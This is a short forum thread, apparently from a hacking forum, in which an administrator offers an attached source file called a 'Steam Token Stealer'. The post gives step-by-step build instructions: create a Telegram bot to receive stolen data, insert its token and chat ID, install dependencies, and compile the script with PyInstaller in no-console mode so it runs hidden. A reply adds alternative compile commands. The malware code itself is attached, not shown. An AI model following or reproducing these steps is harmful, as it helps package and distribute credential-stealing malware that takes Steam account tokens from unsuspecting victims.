Source Checker Steam Token Stealer

  • MF
  • Author
  • Administrator
  • 57
  1. Make a telegram bot https://t.me/BotFather

  2. Fill in the token + chat ID in the code

  3. Install dependencies
    Code Python:
    pip install vdf
    pip install requests
    pip install pyinstaller

  4. Compile
    Code Python:
    py -m PyInstaller --onefile --noconsole main.py
 

Attachments

  • steam.py
    3.8 KB · Views: 21
  • cj
  • New user
  • 0
if the compile script does not work here open cmd and type this
|cd C:your/directiory/here
python -m PyInstaller steam.py|
 
Last edited:
You must log in or register to reply here.
Top